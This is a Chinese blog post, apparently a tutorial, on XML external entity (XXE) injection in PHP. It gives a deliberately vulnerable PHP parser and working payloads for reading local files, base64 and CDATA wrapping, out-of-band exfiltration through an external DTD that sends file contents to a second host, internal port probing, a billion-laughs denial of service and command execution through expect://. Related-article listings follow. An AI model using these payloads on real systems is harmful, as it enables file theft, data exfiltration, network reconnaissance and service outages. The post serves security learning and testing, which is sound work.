XXE xml外部实体注入

最新推荐文章于 2023-10-09 21:47:24 发布
最新推荐文章于 2023-10-09 21:47:24 发布
阅读量320 收藏
点赞数
分类专栏: web漏洞 文章标签: 安全漏洞 php xml dtd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/105773237
版权

在这里插入图片描述
XML基础:
可扩展标记语言,用于传输数据(允许作者自定义自己的标签,和文档结构)
构建模块
元素,属性,实体
PCDATA:被解析的字符数据
CDATA:字符数据(不会被解析器解析)
语法规则
1.所有xml 元素必须有关闭标签
2.xml 标签对大小写敏感
3.xml 必须正确嵌套
4.xml 属性必须加引号
5.实体引用
6.空格会被保留
XML元素
指从开始标签到结束标签的部分
每个元素可以有对应的属性
XML DTD
定义xml文档的合法构建模块,说明xml内容格式范围

内部DOCYYPE声明:

<!DOCTYPE 根元素 [元素声明]>

外部文档声明:

<!DOCTYPE 根元素 SYSTEM "文件名">

声明一个元素:

<!ELEMENT 元素名称 类别>
<!ELEMENT 元素名称 (元素内容)>

声明属性:

<!ATTLIST 元素名称 属性名称 属性类型 默认值>

一个外部实体声明

<!ENTITY 实体名称 SYSTEM "URI/URL">

XXE漏洞
原理:实体可以通过预定义在文档中被调用,而实体的标识符又可以访问本地或远程内容,当允许引用外部实体时,攻击者便构造恶意内容攻击

由于libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。

源码:

<?php

    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;

?>

读取文件:
payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [
<!ENTITY xxe SYSTEM "file:///c:flag.txt"> ]> 
<creds>&xxe;</creds>

在这里插入图片描述

当读取的文件存在‘<’,’&'等字符会被xml解析报错
在这里插入图片描述
可以利用编码,构造payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:flag.txt"> ]> 
<creds>&xxe;</creds>

在这里插入图片描述

或者可利用CDATA:
由于xml限制内部参数实体引用,可搭建服务器进行外部参数实体引用
payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE root [ <!ENTITY % start "<![CDATA["> 
<!ENTITY % go SYSTEM "file:///c:flag.txt"> 
<!ENTITY % end "]]>"> 
<!ENTITY % dtd SYSTEM "http://192.168.238.132/1.dtd"> %dtd; ]> 
<root>&all;</root>

1.dtd内容为:

<!ENTITY all "%start;%go;%end;">

在这里插入图片描述
XXE无回显
由于外部实体参数能请求外部uri,可以利用http协议把数据作为参数进行传递。就实现了数据外带
payload:

<?xml version="1.0"?>
<!DOCTYPE message [  
<!ENTITY % remote SYSTEM "http://192.168.238.132/1.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64encode/resource=file:///c:flag.txt">
%remote;    %send; ]>
<message>1234</message>

1.dtd内容:

<!ENTITY % start
"<!ENTITY &#x25; send SYSTEM 'http://192.168.238.143/index.php?c=%file;'> "
>
 %start;

请添加图片描述
请添加图片描述
内网探测:
payload:也可以进行端口探测

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://192.168.238.143/">]>
<xml>
<stuff>&xxe;</stuff>
</xml>

在这里插入图片描述

不存在则报错:
在这里插入图片描述

DOS攻击:
payload:

<?xml version="1.0"?> <!DOCTYPE lolz [  <!ENTITY lol "lol">  
<!ENTITY lol2 
"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">  
<!ENTITY lol3 
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">  
<!ENTITY lol4 
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">  
<!ENTITY lol5 
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">  
<!ENTITY lol6 
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">  
<!ENTITY lol7 
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">  
<!ENTITY lol8 
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">  
<!ENTITY lol9 
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> 
<lolz>&lol9;</lolz>

可以在内存中小型xml文档扩展超过3GB

利用expect扩展 命令执行
payload:

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]> 
<dir> 
<file>&cmd;</file> 
</dir>

参考:https://xz.aliyun.com/t/3357

~~...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXEXML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
这篇文章主要讨论了CVE-2020-29436,这是一个针对Nexus Repository Manager 3的安全漏洞,该漏洞是由于XML外部实体注入XXE)引起的。Nexus Repository Manager 3是一款广泛使用的软件包仓库管理服务,它允许组织...
XXE外部实体引用注入的原理及利用
cike_y
02-17 618
XXE又称为XML,它是可扩展标记语言(Extensible Markup Language)的缩写,它是一种数据表示格式,常用于传输和存储数据。
【burpsuite安全练兵场-服务端10】XML外部实体注入XXE注入)-9个实验(全)
01-11 8064
【BP靶场portswigger-服务端10-XML外部实体注入XXE注入)】9个实验-万文详细步骤
web漏洞-xml外部实体注入(XXE)
最新发布
rumil的博客
10-09 2154
XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5322
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
XML 外部实体注入
2201_75370376的博客
06-22 942
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
测试XXE注入.docx
09-06
XXE 注入XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
xml外部实体攻击
07-17
xml外部实体使用,漏洞产生原因,详细举例攻击原理,修复方法等
【网络安全】XXE--XML外部实体注入
边缘拼命划水的小陈
04-24 1015
XML外部实体注入XML EXTERNAL ENTITY)简称XXE漏洞,概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
利用 XML 外部实体注入
blacklordking的博客
06-21 394
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体
PHP环境 XML外部实体注入漏洞(XXE
EC_Carrot的博客
07-19 972
漏洞简介 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡,这里用libxml2.8.0版本编译进PHP中来复现。 漏洞复现 Simple XXE Payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> &lt
PHP环境 XML外部实体注入漏洞
Snowflake1997的博客
03-08 266
漏洞描述 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。 影响范围 libxml2.8.0版本 复现过程 使用vulhub cd /vulhub/php/php_xxe 进入目录 docker-compose up -d 启动 访问 抓包,刷新一下页面就行 发送到repeater 进行修改 在最后增加上这个代码 <?.
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值